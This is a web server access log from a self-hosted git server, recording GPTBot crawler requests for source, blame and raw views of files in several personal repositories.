"/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10483] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 16198] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10864] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16389] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" +[17/Feb/2026:13:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151600] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18148] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22878] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 16408] [Gzip 9.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" +[17/Feb/2026:13:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 6438] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" +[17/Feb/2026:13:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13508] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15887] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" +[17/Feb/2026:13:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" +[17/Feb/2026:13:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" [Client 74.7.227.38] [Length 11444] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10663] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10628] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 13179] [Gzip 6.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23697] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" +[17/Feb/2026:13:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" +[17/Feb/2026:13:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11375] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 11353] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" +[17/Feb/2026:13:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/forks" [Client 74.7.227.38] [Length 7289] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:13:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls" [Client 74.7.227.38] [Length 9924] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" [Client 74.7.227.38] [Length 9849] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" +[17/Feb/2026:13:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 14388] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" +[17/Feb/2026:13:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" [Client 74.7.227.38] [Length 14235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" +[17/Feb/2026:13:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10120] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" +[17/Feb/2026:13:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" +[17/Feb/2026:13:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 74.7.227.38] [Length 12998] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" +[17/Feb/2026:13:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/stars" [Client 74.7.227.38] [Length 7381] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" +[17/Feb/2026:13:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10984] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10481] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 229] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/graph" [Client 74.7.227.38] [Length 9102] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:13:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" +[17/Feb/2026:13:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11646] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" [Client 74.7.227.38] [Length 13280] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html" +[17/Feb/2026:13:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11519] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 11343] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 